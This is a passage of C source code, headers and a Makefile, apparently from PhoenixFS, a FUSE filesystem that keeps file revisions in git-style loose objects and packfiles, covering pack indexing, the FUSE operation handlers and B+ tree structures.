if (nr_objects) {
sorted_by_sha = objects;
list = sorted_by_sha;
last = sorted_by_sha + nr_objects;
for (i = 0; i < nr_objects; ++i) {
if (objects[i]->offset > last_obj_offset)
last_obj_offset = objects[i]->offset;
}
qsort(sorted_by_sha, nr_objects, sizeof(sorted_by_sha[0]),
sha1_compare);
}
else
sorted_by_sha = list = last = NULL;
if (loaded_pack)
munmap((void *) packroot.idx_data, packroot.idx_size);
if (!(idxfh = fopen(packroot.idx_path, "wb+")))
die("Can't create idx file: %s", packroot.idx_path);
hdr.signature = htonl(PACK_IDX_SIGNATURE);
hdr.version = htonl(PACK_IDX_VERSION);
fwrite(&hdr, sizeof(hdr), 1, idxfh);
/* Write the fanout table */
for (i = 0; i < 256; i++) {
struct pack_idx_entry **next = list;
while (next < last) {
struct pack_idx_entry *obj = *next;
if (obj->sha1[0] != i)
break;
next++;
}
array[i] = htonl(next - sorted_by_sha);
list = next;
}
fwrite(&array, 256 * sizeof(uint32_t), 1, idxfh);
/* Write the actual SHA1 entries: 20 * nr */
list = sorted_by_sha;
for (i = 0; i < nr_objects; i++) {
struct pack_idx_entry *obj = *list++;
fwrite(obj->sha1, 20, 1, idxfh);
}
/* Omit the crc32 table: 4 * nr */
/* Write the 32-bit offset table: 4 * nr */
nr_large_offset = 0;
list = sorted_by_sha;
for (i = 0; i < nr_objects; i++) {
struct pack_idx_entry *obj = *list++;
uint32_t offset = (obj->offset <= pack_idx_off32_limit) ?
obj->offset : (0x80000000 | nr_large_offset++);
offset = htonl(offset);
print_sha1(sha1_digest, obj->sha1);
PHOENIXFS_DBG("unmap_write_idx:: %s %llu", sha1_digest,
(long long int)obj->offset);
fwrite(&offset, sizeof(uint32_t), 1, idxfh);
}
/* Write the 64-bit offset table: 8 * nr */
list = sorted_by_sha;
while (nr_large_offset) {
struct pack_idx_entry *obj = *list++;
uint64_t offset = obj->offset;
if (offset > pack_idx_off32_limit) {
uint32_t split[2];
split[0] = htonl(offset >> 32);
split[1] = htonl(offset & 0xffffffff);
fwrite(split, sizeof(uint64_t), 1, idxfh);
nr_large_offset--;
}
}
/* Omit the checksum trailer: 2 * 20 */
for (i = 0; i < nr_objects; i++)
free(objects[i]);
fclose(idxfh);
}
static int write_pack_hdr(const char *pack_path)
{
FILE *packfh;
struct stat st;
struct pack_header hdr;
if (!(packfh = fopen(pack_path, "wb+")) ||
(stat(pack_path, &st) < 0))
return -errno;
packroot.packfh = packfh;
packroot.pack_size = st.st_size;
hdr.signature = htonl(PACK_SIGNATURE);
hdr.version = htonl(PACK_VERSION);
fwrite(&hdr, sizeof(hdr), 1, packfh);
return 0;
}
void dump_packing_info(const char *loosedir)
{
PHOENIXFS_DBG("dump_packing_info:: %s", loaded_pack ? "append" : "create");
if (!loaded_pack)
write_pack_hdr(packroot.pack_path);
packup_loose_objects(packroot.packfh, packroot.idx_data,
packroot.nr, loosedir);
fclose(packroot.packfh);
}
void mark_for_packing(const unsigned char *sha1, size_t size)
{
add_loose_entry((unsigned char *)sha1, size);
}
<|start_filename|>fuse.c<|end_filename|>
#include "fuse.h"
#include <ctype.h>
#include <dirent.h>
#include <errno.h>
#include <fcntl.h>
#include <fuse.h>
#include <libgen.h>
#include <limits.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdarg.h>
#include <dirent.h>
#include <time.h>
#include <zlib.h>
#include <ftw.h>
#include <sys/types.h>
#include <pthread.h>
static char xpath[PATH_MAX] = "\0";
static char openpath[PATH_MAX] = "\0";
static pthread_mutex_t phoenixfs_mutexlock = PTHREAD_MUTEX_INITIALIZER;
void *phoenixfs_init(struct fuse_conn_info *conn)
{
return ROOTENV;
}
static int phoenixfs_getattr(const char *path, struct stat *stbuf)
{
struct file_record *fr;
struct dir_record *dr;
int rev;
rev = parse_pathspec(xpath, path);
build_xpath(openpath, xpath, rev);
PHOENIXFS_DBG("getattr:: %s %d", openpath, rev);
/* Try underlying FS */
if (lstat(openpath, stbuf) < 0) {
/* Try fstree */
if (!(dr = find_dr(xpath))) {
if (!(fr = find_fr(xpath, rev)))
return -ENOENT;
else {
memset(stbuf, 0, sizeof(struct stat));
fill_stat(stbuf, fr);
return 0;
}
}
memset(stbuf, 0, sizeof(struct stat));
stbuf->st_mode = S_IFDIR | 0755;
}
return 0;
}
static int phoenixfs_fgetattr(const char *path, struct stat *stbuf,
struct fuse_file_info *fi)
{
PHOENIXFS_DBG("fgetattr:: %s", path);
if (fstat(fi->fh, stbuf) < 0)
return -errno;
return 0;
}
static int phoenixfs_opendir(const char *path, struct fuse_file_info *fi)
{
struct dir_record *dr;
DIR *dp;
PHOENIXFS_DBG("opendir:: %s", path);
build_xpath(xpath, path, 0);
/* Try underlying fs */
if (!(dp = opendir(xpath))) {
/* Try fstree */
if (!(dr = find_dr(path)))
return -ENOENT;
else {
/* Make the directory and open it */
mkdir(xpath, S_IRUSR | S_IWUSR | S_IXUSR);
dp = opendir(xpath);
}
}
fi->fh = (intptr_t) dp;
return 0;
}
static int phoenixfs_readdir(const char *path, void *buf, fuse_fill_dir_t filler,
off_t offset, struct fuse_file_info *fi)
{
DIR *dp;
struct dirent *de;
struct stat st;
void *record;
struct node *iter_root, *iter;
struct vfile_record *vfr;
struct dir_record *dr;
register int i;
dp = (DIR *) (uintptr_t) fi->fh;
if (!(de = readdir(dp)))
return -errno;
/* Fill directories from backing FS */
do {
/* Hide the .git directory, and enumerate only directories */
if (strcmp(de->d_name, ".git") && de->d_type == DT_DIR) {
PHOENIXFS_DBG("readdir:: fs: %s", de->d_name);
if (filler(buf, de->d_name, NULL, 0))
return -ENOMEM;
}
} while ((de = readdir(dp)) != NULL);
/* Fill files from fstree */
if (!(dr = find_dr(path)) || !dr->vroot) {
PHOENIXFS_DBG("readdir:: fstree: blank");
return 0;
}
iter_root = dr->vroot;
iter = dr->vroot;
/* Use only the leaves */
while (!iter->is_leaf)
iter = iter->pointers[0];
while (1) {
for (i = 0; i < iter->num_keys; i++) {
if (!(record = find(iter_root, iter->keys[i], 0)))
PHOENIXFS_DBG("readdir:: key listing issue");
vfr = (struct vfile_record *) record;
fill_stat(&st, vfr->history[vfr->HEAD]);
PHOENIXFS_DBG("readdir:: tree fill: %s", (const char *) vfr->name);
if (filler(buf, (const char *) vfr->name, &st, 0))
return -ENOMEM;
}
if (iter->pointers && iter->pointers[BTREE_ORDER - 1] != NULL)
iter = iter->pointers[BTREE_ORDER - 1];
else
break;
}
return 0;
}
static int phoenixfs_releasedir(const char *path, struct fuse_file_info *fi)
{
if (closedir((DIR *) (uintptr_t) fi->fh) < 0)
return -errno;
return 0;
}
static int phoenixfs_access(const char *path, int mask)
{
PHOENIXFS_DBG("access:: %s", path);
build_xpath(xpath, path, 0);
if (access(xpath, mask) < 0)
return -errno;
return 0;
}
static int phoenixfs_symlink(const char *path, const char *link)
{
char xlink[PATH_MAX];
PHOENIXFS_DBG("symlink:: %s to %s", link, path);
sprintf(xpath, "%s/%s", ROOTENV->fsback, path);
build_xpath(xlink, link, 0);
if (symlink(xpath, xlink) < 0)
return -errno;
fstree_insert_update_file(link, path);
return 0;
}
static int phoenixfs_rename(const char *path, const char *newpath)
{
char xnewpath[PATH_MAX];
struct dir_record *dr;
struct vfile_record *vfr, *new_vfr;
char *filename, *newfilename;
uint16_t key = ~0;
size_t length;
uint8_t start_rev, rev_nr;
PHOENIXFS_DBG("rename:: %s to %s", path, newpath);
build_xpath(xpath, path, 0);
build_xpath(xnewpath, newpath, 0);
if (rename(xpath, xnewpath) < 0)
return -errno;
/* Update fstree */
filename = split_basename(path, xpath);
if (!(dr = find_dr(xpath))) {
PHOENIXFS_DBG("rename:: Missing dr for %s", xpath);
return 0;
}
/* Find the old vfr to copy out data from and remove */
length = (size_t) strlen((char *) filename);
key = compute_crc32(key, (const unsigned char *) filename, length);
if (!(vfr = find(dr->vroot, key, 0))) {
PHOENIXFS_DBG("rename:: Missing vfr for %s", path);
return 0;
}
/* Make a new vfr and copy out history from old vfr */
newfilename = split_basename(path, NULL);
new_vfr = make_vfr(newfilename);
/* Compute start_rev and rev_nr */
if (vfr->HEAD < 0) {
start_rev = 0;
rev_nr = 0;
} else if (vfr->history[(vfr->HEAD + 1) % REV_TRUNCATE]) {
/* History is full, and is probably wrapping around */
start_rev = (vfr->HEAD + 1) % REV_TRUNCATE;
rev_nr = 20;
} else {
/* History is not completely filled */
start_rev = 0;
rev_nr = vfr->HEAD + 1;
}
PHOENIXFS_DBG("rename:: copying %d revisions", rev_nr);
while (start_rev < rev_nr) {
new_vfr->history[start_rev] = vfr->history[start_rev];
start_rev = (start_rev + 1) % REV_TRUNCATE;
}
new_vfr->HEAD = rev_nr - 1;
insert_vfr(dr, new_vfr);
/* Remove old vfr */
dr->vroot = remove_entry(dr->vroot, key);
return 0;
}
static int phoenixfs_link(const char *path, const char *newpath)
{
static char xnewpath[PATH_MAX];
PHOENIXFS_DBG("link:: %s to %s", path, newpath);
build_xpath(xpath, path, 0);
build_xpath(xnewpath, newpath, 0);
if (link(xpath, xnewpath) < 0)
return -errno;
return 0;
}
static int phoenixfs_chmod(const char *path, mode_t mode)
{
PHOENIXFS_DBG("chmod:: %s", path);
build_xpath(xpath, path, 0);
if (chmod(xpath, mode) < 0)
return -errno;
return 0;
}
static int phoenixfs_chown(const char *path, uid_t uid, gid_t gid)
{
/* chown is a no-op */
return 0;
}
static int phoenixfs_truncate(const char *path, off_t newsize)
{
PHOENIXFS_DBG("truncate:: %s to %lld", path, (long long int)newsize);
build_xpath(xpath, path, 0);
if (truncate(xpath, newsize) < 0)
return -errno;
return 0;
}
static int phoenixfs_utime(const char *path, struct utimbuf *ubuf)
{
PHOENIXFS_DBG("utime:: %s", path);
build_xpath(xpath, path, 0);
if (utime(xpath, ubuf) < 0)
return -errno;
return 0;
}
static int phoenixfs_open(const char *path, struct fuse_file_info *fi)
{
int rev, fd;
FILE *infile, *fsfile;
char fspath[PATH_MAX];
struct file_record *fr;
char sha1_digest[40];
rev = parse_pathspec(xpath, path);
build_xpath(fspath, xpath, 0);
/* Skip zinflate for entries not in fstree */
if (!(fr = find_fr(xpath, rev)))
goto END;
/* Build openpath by hand */
print_sha1(sha1_digest, fr->sha1);
sprintf(openpath, "%s/.git/loose/%s", ROOTENV->fsback, sha1_digest);
if (access(openpath, F_OK) < 0) {
/* Try extracting from packfile */
sprintf(xpath, "%s/.git/loose", ROOTENV->fsback);
if (unpack_entry(fr->sha1, xpath) < 0)
return -ENOENT;
else
PHOENIXFS_DBG("open:: pack %s", sha1_digest);
}
else
PHOENIXFS_DBG("open:: loose %s", sha1_digest);
/* zinflate openpath onto fspath */
PHOENIXFS_DBG("open:: zinflate %s onto %s", sha1_digest, fspath);
if (!(infile = fopen(openpath, "rb")) ||
!(fsfile = fopen(fspath, "wb+")))
return -errno;
if (zinflate(infile, fsfile) != Z_OK)
PHOENIXFS_DBG("open:: zinflate issue");
fclose(infile);
fclose(fsfile);
END:
if ((fd = open(fspath, fi->flags)) < 0)
return -errno;
fi->fh = fd;
return 0;
}
static int phoenixfs_mknod(const char *path, mode_t mode, dev_t dev)
{
PHOENIXFS_DBG("mknod:: %s", path);
build_xpath(xpath, path, 0);
if (mknod(xpath, mode, dev) < 0)
return -errno;
return 0;
}
/**
* If this method is not implemented or under Linux kernel
* versions earlier than 2.6.15, the mknod() and open() methods
* will be called instead.
*/
static int phoenixfs_create(const char *path, mode_t mode,
struct fuse_file_info *fi)
{
int fd;
/* Always pass through to underlying filesystem */
PHOENIXFS_DBG("create:: %s", path);
build_xpath(xpath, path, 0);
if ((fd = creat(xpath, mode)) < 0)
return -errno;
fi->fh = fd;
return 0;
}
static int phoenixfs_read(const char *path, char *buf, size_t size,
off_t offset, struct fuse_file_info *fi)
{
ssize_t read_bytes;
PHOENIXFS_DBG("read:: %s", path);
pthread_mutex_lock(&phoenixfs_mutexlock);
if ((read_bytes = pread(fi->fh, buf, size, offset)) < 0) {
pthread_mutex_unlock(&phoenixfs_mutexlock);
return -errno;
}
pthread_mutex_unlock(&phoenixfs_mutexlock);
return read_bytes;
}
static int phoenixfs_write(const char *path, const char *buf, size_t size,
off_t offset, struct fuse_file_info *fi)
{
ssize_t written_bytes;
PHOENIXFS_DBG("write:: %s", path);
pthread_mutex_lock(&phoenixfs_mutexlock);
if ((written_bytes = pwrite(fi->fh, buf, size, offset)) < 0) {
pthread_mutex_unlock(&phoenixfs_mutexlock);
return -errno;
}
pthread_mutex_unlock(&phoenixfs_mutexlock);
return written_bytes;
}
static int phoenixfs_statfs(const char *path, struct statvfs *statv)
{
PHOENIXFS_DBG("statfs:: %s", path);
build_xpath(xpath, path, 0);
if (statvfs(xpath, statv) < 0)
return -errno;
return 0;
}
static int phoenixfs_release(const char *path, struct fuse_file_info *fi)
{
struct file_record *fr;
FILE *infile, *outfile;
struct stat st;
unsigned char sha1[20];
char sha1_digest[40];
char outfilename[40];
char inpath[PATH_MAX];
char outpath[PATH_MAX];
int rev, ret;
pthread_mutex_lock(&phoenixfs_mutexlock);
/* Don't recursively backup history */
if ((rev = parse_pathspec(xpath, path))) {
PHOENIXFS_DBG("release:: history: %s", path);
/* Inflate the original version back onto the filesystem */
if (!(fr = find_fr(xpath, 0))) {
PHOENIXFS_DBG("release:: Can't find revision 0!");
pthread_mutex_unlock(&phoenixfs_mutexlock);
return 0;
}
print_sha1(sha1_digest, fr->sha1);
sprintf(inpath, "%s/.git/loose/%s", ROOTENV->fsback, sha1_digest);
build_xpath(outpath, xpath, 0);
if (!(infile = fopen(inpath, "rb")) ||
!(outfile = fopen(outpath, "wb+"))) {
pthread_mutex_unlock(&phoenixfs_mutexlock);
return -errno;
}
PHOENIXFS_DBG("release:: history: zinflate %s onto %s",
sha1_digest, outpath);
rewind(infile);
rewind(outfile);
if (zinflate(infile, outfile) != Z_OK)
PHOENIXFS_DBG("release:: zinflate issue");
fflush(outfile);
fclose(infile);
fclose(outfile);
if (close(fi->fh) < 0) {
PHOENIXFS_DBG("release:: can't really close");
pthread_mutex_unlock(&phoenixfs_mutexlock);
return -errno;
}
pthread_mutex_unlock(&phoenixfs_mutexlock);
return 0;
}
/* Attempt to create a backup */
build_xpath(xpath, path, 0);
if (!(infile = fopen(xpath, "rb")) ||
(lstat(xpath, &st) < 0)) {
pthread_mutex_unlock(&phoenixfs_mutexlock);
return -errno;
}
if ((ret = sha1_file(infile, st.st_size, sha1)) < 0) {
fclose(infile);
pthread_mutex_unlock(&phoenixfs_mutexlock);
return ret;
}
print_sha1(outfilename, sha1);
sprintf(outpath, "%s/.git/loose/%s", ROOTENV->fsback, outfilename);
if (!access(outpath, F_OK)) {
/* SHA1 match; don't overwrite file as an optimization */
PHOENIXFS_DBG("release:: not overwriting: %s", outpath);
goto END;
}
if (!(outfile = fopen(outpath, "wb"))) {
fclose(infile);
pthread_mutex_unlock(&phoenixfs_mutexlock);
return -errno;
}
/* Rewind and seek back */
rewind(infile);
PHOENIXFS_DBG("release:: zdeflate %s onto %s", xpath, outfilename);
if (zdeflate(infile, outfile, -1) != Z_OK)
PHOENIXFS_DBG("release:: zdeflate issue");
mark_for_packing(sha1, st.st_size);
fclose(outfile);
END:
fclose(infile);
if (close(fi->fh) < 0) {
PHOENIXFS_DBG("release:: can't really close");
return -errno;
}
/* Update the fstree */
fstree_insert_update_file(path, NULL);
pthread_mutex_unlock(&phoenixfs_mutexlock);
return 0;
}
static int phoenixfs_fsync(const char *path,
int datasync, struct fuse_file_info *fi)
{
PHOENIXFS_DBG("fsync:: %s", path);
if (datasync) {
if (fdatasync(fi->fh) < 0)
return -errno;
} else
if (fsync(fi->fh) < 0)
return -errno;
return 0;
}
static int phoenixfs_ftruncate(const char *path,
off_t offset, struct fuse_file_info *fi)
{
PHOENIXFS_DBG("ftruncate:: %s", path);
build_xpath(xpath, path, 0);
if (ftruncate(fi->fh, offset) < 0)
return -errno;
return 0;
}
static int phoenixfs_readlink(const char *path, char *link, size_t size)
{
/* Always pass through to underlying filesystem */
PHOENIXFS_DBG("readlink:: %s", path);
build_xpath(xpath, path, 0);
if (readlink(xpath, link, size - 1) < 0)
return -errno;
return 0;
}
static int phoenixfs_mkdir(const char *path, mode_t mode)
{
PHOENIXFS_DBG("mkdir:: %s", path);
build_xpath(xpath, path, 0);
if (mkdir(xpath, mode) < 0)
return -errno;
return 0;
}
static int phoenixfs_unlink(const char *path)
{
/* Always pass through to underlying filesystem */
PHOENIXFS_DBG("unlink:: %s", path);
fstree_remove_file(path);
build_xpath(xpath, path, 0);
if (unlink(xpath) < 0)
return -errno;
return 0;
}
static int phoenixfs_rmdir(const char *path)
{
/* Always pass through to underlying filesystem */
PHOENIXFS_DBG("rmdir:: %s", path);
build_xpath(xpath, path, 0);
if (rmdir(xpath) < 0)
return -errno;
return 0;
}
static void phoenixfs_destroy(void *userdata)
{
FILE *outfile;
/* Persist the fstree */
sprintf(xpath, "%s/.git/fstree", ROOTENV->fsback);
if (!(outfile = fopen(xpath, "wb"))) {
PHOENIXFS_DBG("destroy:: Can't open .git/fstree to persist");
return;
}
PHOENIXFS_DBG("destroy:: dumping fstree");
fstree_dump_tree(outfile);
fclose(outfile);
PHOENIXFS_DBG("destroy:: packing loose objects");
sprintf(xpath, "%s/.git/loose", ROOTENV->fsback);
dump_packing_info(xpath);
}
static struct fuse_operations phoenixfs_oper = {
.init = phoenixfs_init,
.getattr = phoenixfs_getattr,
.fgetattr = phoenixfs_fgetattr,
.open = phoenixfs_open,
.mknod = phoenixfs_mknod,
.releasedir = phoenixfs_releasedir,
.create = phoenixfs_create,
.read = phoenixfs_read,
.write = phoenixfs_write,
.statfs = phoenixfs_statfs,
.access = phoenixfs_access,
.getdir = NULL,
.readdir = phoenixfs_readdir,
.opendir = phoenixfs_opendir,
.readlink = phoenixfs_readlink,
.mkdir = phoenixfs_mkdir,
.rmdir = phoenixfs_rmdir,
.unlink = phoenixfs_unlink,
.fsync = phoenixfs_fsync,
.release = phoenixfs_release,
.ftruncate = phoenixfs_ftruncate,
.symlink = phoenixfs_symlink,
.link = phoenixfs_link,
.chown = phoenixfs_chown,
.chmod = phoenixfs_chmod,
.rename = phoenixfs_rename,
.truncate = phoenixfs_truncate,
.utime = phoenixfs_utime,
#if 0
.setxattr = phoenixfs_setxattr;
.getxattr = phoenixfs_getxattr;
.listxattr = phoenixfs_listxattr;
.removexattr = phoenixfs_removexattr;
.fsyncdir = phoenixfs_fsyncdir,
.lock = phoenixfs_lock,
.flush = phoenixfs_flush,
.utimens = phoenixfs_utimens,
.bmap = phoenixfs_bmap,
.poll = phoenixfs_poll,
.ioctl = phoenixfs_ioctl,
#endif
.destroy = phoenixfs_destroy,
};
/* phoenixfs mount <path> <mountpoint> */
/* argv[2] is fsback and argv[3] is the mountpoint */
int phoenixfs_fuse(int argc, char *argv[])
{
char *nargv[4];
FILE *infile;
void *record;
struct stat st;
register int i;
struct dir_record *dr;
struct node *iter, *iter_root;
struct env_t rootenv;
/* Sanitize fsback */
if (!realpath(argv[2], rootenv.fsback))
die("Invalid fsback: %s", argv[2]);
if ((lstat(rootenv.fsback, &st) < 0) ||
(access(rootenv.fsback, R_OK | W_OK | X_OK) < 0))
die("fsback doesn't have rwx permissions: %s",
rootenv.fsback);
if (!S_ISDIR(st.st_mode))
die("fsback not a directory: %s", rootenv.fsback);
/* Sanitize mountpoint */
if (!realpath(argv[3], rootenv.mountpoint))
die("Invalid mountpoint: %s", argv[3]);
if ((lstat(rootenv.mountpoint, &st) < 0) ||
(access(rootenv.mountpoint, R_OK | W_OK | X_OK) < 0))
die("mountpoint doesn't have rwx permissions: %s",
rootenv.mountpoint);
if (!S_ISDIR(st.st_mode))
die("mountpoint not a directory: %s", rootenv.mountpoint);
/* Check for .git directory */
sprintf(xpath, "%s/.git", rootenv.fsback);
mkdir(xpath, S_IRUSR | S_IWUSR | S_IXUSR);
if ((lstat(xpath, &st) < 0) ||
(access(xpath, R_OK | W_OK | X_OK) < 0))
die(".git doesn't have rwx permissions: %s", xpath);
if (!S_ISDIR(st.st_mode))
die(".git not a directory: %s", xpath);
/* Check for .git/loose directory */
sprintf(xpath, "%s/.git/loose", rootenv.fsback);
mkdir(xpath, S_IRUSR | S_IWUSR | S_IXUSR);
if ((lstat(xpath, &st) < 0) ||
(access(xpath, R_OK | W_OK | X_OK) < 0))
die(".git/loose doesn't have rwx permissions: %s", xpath);
if (!S_ISDIR(st.st_mode))
die(".git/loose not a directory: %s", xpath);
PHOENIXFS_DBG("phoenixfs_fuse:: fsback: %s, mountpoint: %s",
rootenv.fsback, rootenv.mountpoint);
/* Check for .git/fstree to load tree */
sprintf(xpath, "%s/.git/fstree", rootenv.fsback);
if (!access(xpath, F_OK) &&
(infile = fopen(xpath, "rb"))) {
PHOENIXFS_DBG("phoenixfs_fuse:: loading fstree");
fstree_load_tree(infile);
fclose(infile);
}
/* Re-create dr tree */
iter_root = get_fsroot();
iter = get_fsroot();
if (!iter)
goto END;
while (!iter->is_leaf)
iter = iter->pointers[0];
while (1) {
for (i = 0; i < iter->num_keys; i++) {
if (!(record = find(iter_root, iter->keys[i], 0)))
PHOENIXFS_DBG("readdir:: key listing issue");
dr = (struct dir_record *) record;
PHOENIXFS_DBG("phoenixfs_fuse:: mkdir: %s",
(const char *) dr->name);
sprintf(xpath, "%s%s", rootenv.fsback,
(const char *) dr->name);
mkdir(xpath, S_IRUSR | S_IWUSR | S_IXUSR);
}
if (iter->pointers && iter->pointers[BTREE_ORDER - 1] != NULL)
iter = iter->pointers[BTREE_ORDER - 1];
else
break;
}
END:
/* Check for .git/master.pack and .git/master.idx */
sprintf(xpath, "%s/.git/master.pack", rootenv.fsback);
sprintf(openpath, "%s/.git/master.idx", rootenv.fsback);
if ((access(xpath, F_OK) < 0) ||
(access(openpath, F_OK) < 0)) {
PHOENIXFS_DBG("phoenixfs_fuse:: not loading packing info");
load_packing_info(xpath, openpath, false);
}
else {
PHOENIXFS_DBG("phoenixfs_fuse:: loading packing info");
load_packing_info(xpath, openpath, 1);
}
nargv[0] = argv[0];
nargv[1] = "-d";
nargv[2] = "-odefault_permissions";
nargv[3] = argv[3];
return fuse_main(4, nargv, &phoenixfs_oper, &rootenv);
}
<|start_filename|>btree.h<|end_filename|>
#ifndef BTREE_H_
#define BTREE_H_
#include <stdbool.h>
#include <stdlib.h>
#include <stdint.h>
#include <limits.h>
#define BTREE_ORDER 3
/* How many revisions of each file to store */
#define REV_TRUNCATE 20
enum mode_t {
NODE_REGULAR,
NODE_SYMLINK,
NODE_EXECUTABLE,
};
/*Type representing a node in the B+ tree.
*This type is general enough to serve for both
*the leaf and the internal node.
*The heart of the node is the array
*of keys and the array of corresponding
*pointers. The relation between keys
*and pointers differs between leaves and
*internal nodes. In a leaf, the index
*of each key equals the index of its corresponding
*pointer, with a maximum of order - 1 key-pointer
*pairs. The last pointer points to the
*leaf to the right (or NULL in the case
*of the rightmost leaf).
*In an internal node, the first pointer
*refers to lower nodes with keys less than
*the smallest key in the keys array. Then,
*with indices i starting at 0, the pointer
*at i + 1 points to the subtree with keys
*greater than or equal to the key in this
*node at index i.
*The num_keys field is used to keep
*track of the number of valid keys.
*In an internal node, the number of valid
*pointers is always num_keys + 1.
*In a leaf, the number of valid pointers
*to data is always num_keys. The
*last leaf pointer points to the next leaf.
*/
typedef struct node {
void **pointers;
uint16_t *keys;
struct node *parent;
bool is_leaf;
uint16_t num_keys;
struct node *next; // Used for queue.
} node;
struct file_record {
unsigned char sha1[20];
unsigned char follow[PATH_MAX];
enum mode_t mode;
size_t size;
time_t mtime;
};
struct vfile_record {
unsigned char name[PATH_MAX];
struct file_record *history[REV_TRUNCATE];
int8_t HEAD;
};
struct dir_record {
unsigned char name[PATH_MAX];
struct node *vroot;
};
// FUNCTION PROTOTYPES.
// Output and utility.
void usage_1(void);
void usage_2(void);
void enqueue(node *new_node);
node *dequeue(void);
int height(node *root);
int path_to_root(node *root, node *child);
void print_leaves(node *root);
void print_tree(node *root);
node *find_leaf(node *root, uint16_t key, bool verbose);
void *find(node *root, uint16_t key, bool verbose);
int cut(int length);
// Insertion.
node *make_node(void);
node *make_leaf(void);
int get_left_index(node *parent, node *left);
node *insert_into_leaf(node *leaf, uint16_t key, struct dir_record *pointer);
node *insert_into_leaf_after_splitting(node *root, node *leaf, uint16_t key, struct dir_record *pointer);
node *insert_into_node(node *root, node *parent,
int left_index, uint16_t key, node *right);
node *insert_into_node_after_splitting(node *root, node *parent, int left_index,
uint16_t key, node *right);
node *insert_into_parent(node *root, node *left, uint16_t key, node *right);
node *insert_into_new_root(node *left, uint16_t key, node *right);
node *start_new_tree(uint16_t key, struct dir_record *pointer);
node *insert(node *root, uint16_t key, void *value);
// Deletion.
int get_neighbor_index(node *n);
node *adjust_root(node *root);
node *coalesce_nodes(node *root, node *n, node *neighbor, int neighbor_index, int k_prime);
node *redistribute_nodes(node *root, node *n, node *neighbor, int neighbor_index,
int k_prime_index, int k_prime);
node *delete_entry(node *root, node *n, uint16_t key, void *pointer);
node *delete(node *root, uint16_t key);
void destroy_tree(node *root);
#endif
<|start_filename|>pack.h<|end_filename|>
#ifndef PACK_H_
#define PACK_H_
#define PACK_SIGNATURE 0x5041434b
#define PACK_IDX_SIGNATURE 0xff744f63
#define PACK_IDX_VERSION 2
#define PACK_VERSION 3
#define pack_idx_off32_limit 0x7fffffff
#include "common.h"
#include "buffer.h"
#include "sha1.h"
#include <stdbool.h>
#include <stdio.h>
#include <stdint.h>
#include <unistd.h>
#include <limits.h>
struct packed_git {
char pack_path[PATH_MAX];
char idx_path[PATH_MAX];
FILE *packfh;
const void *idx_data;
size_t pack_size;
size_t idx_size;
uint32_t nr;
};
/* Omit number of entries in pack */
struct pack_header {
uint32_t signature;
uint32_t version;
};
struct pack_idx_header {
uint32_t signature;
uint32_t version;
};
/* pack_idx_entry contains a trailing size field that's used only by
the loose module internally; we will strip it off before writing it
to the actual index */
struct pack_idx_entry {
unsigned char sha1[20];
off_t offset;
size_t size;
};
int initialize_pack_file(const char *pack_path, const char *idx_path);
int load_packing_info(const char *pack_path, const char *idx_path,
bool existing_pack);
void dump_packing_info(const char *loosedir);
int map_pack_idx(FILE *src);
void unmap_write_idx(struct pack_idx_entry *objects[], int nr_objects);
void packup_loose_objects(FILE *packfh, const void *idx_data,
uint32_t idx_nr, const char *loosedir);
void mark_for_packing(const unsigned char *sha1, size_t size);
void add_loose_entry(unsigned char *sha1, size_t size);
int unpack_entry(unsigned char *sha1, const char *loosedir);
#endif
<|start_filename|>Makefile<|end_filename|>
CC = gcc
RM = rm -f
MV = mv
XDIFF_LIB = xdiff/lib.a
SHA1_LIB = block-sha1/lib.a
BUILTIN_OBJS =
BUILTIN_OBJS += common.o
BUILTIN_OBJS += main.o
BUILTIN_OBJS += fuse.o
BUILTIN_OBJS += buffer.o
BUILTIN_OBJS += compress.o
BUILTIN_OBJS += pack.o
BUILTIN_OBJS += sha1.o
BUILTIN_OBJS += diff.o
BUILTIN_OBJS += btree.o
BUILTIN_OBJS += crc32.o
BUILTIN_OBJS += fstree.o
BUILTIN_OBJS += persist.o
BUILTIN_OBJS += delta.o
BUILTIN_OBJS += loose.o
ALL_TARGETS = phoenixfs
CFLAGS = -g -O0 -Wall -Werror $(shell pkg-config fuse --cflags) $(shell pkg-config zlib --cflags)
LDFLAGS = $(shell pkg-config fuse --libs) $(shell pkg-config zlib --libs)
ALL_CFLAGS = $(CFLAGS)
ALL_LDFLAGS = $(LDFLAGS)
ALL_LIBS = $(XDIFF_LIB) $(SHA1_LIB)
QUIET_SUBDIR0 = +$(MAKE) -C # space to separate -C and subdir
QUIET_SUBDIR1 =
ifneq ($(findstring $(MAKEFLAGS),w),w)
PRINT_DIR = --no-print-directory
else # "make -w"
NO_SUBDIR = :
endif
ifneq ($(findstring $(MAKEFLAGS),s),s)
ifndef V
QUIET_CC = @echo ' ' CC $@;
QUIET_AR = @echo ' ' AR $@;
QUIET_LINK = @echo ' ' LINK $@;
QUIET_SUBDIR0 = +@subdir=
QUIET_SUBDIR1 = ;$(NO_SUBDIR) echo ' ' SUBDIR $$subdir; \
$(MAKE) $(PRINT_DIR) -C $$subdir
endif
endif
XDIFF_OBJS = xdiff/xdiffi.o xdiff/xprepare.o xdiff/xutils.o xdiff/xemit.o \
xdiff/xmerge.o xdiff/xpatience.o
SHA1_OBJS = block-sha1/sha1.o
all:: $(ALL_TARGETS)
phoenixfs$X: $(BUILTIN_OBJS) $(ALL_LIBS)
$(QUIET_LINK)$(CC) $(ALL_CFLAGS) -o $@ $(BUILTIN_OBJS) \
$(ALL_LDFLAGS) $(ALL_LIBS)
%.o: %.c %.h btree.h
$(QUIET_CC)$(CC) -o $*.o -c $(ALL_CFLAGS) $<
$(XDIFF_LIB): $(XDIFF_OBJS)
$(QUIET_AR)$(RM) $@ && $(AR) rcs $@ $^
$(SHA1_LIB): $(SHA1_OBJS)
$(QUIET_AR)$(RM) $@ && $(AR) rcs $@ $^
test:
$(MAKE) -C t
clean:
$(RM) $(ALL_TARGETS) $(BUILTIN_OBJS) $(XDIFF_OBJS) \
$(SHA1_OBJS) $(ALL_LIBS)
.PHONY: all clean FORCE
<|start_filename|>xdiff/xemit.c<|end_filename|>
/*
* LibXDiff by <NAME> ( File Differential Library )
* Copyright (C) 2003 <NAME>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
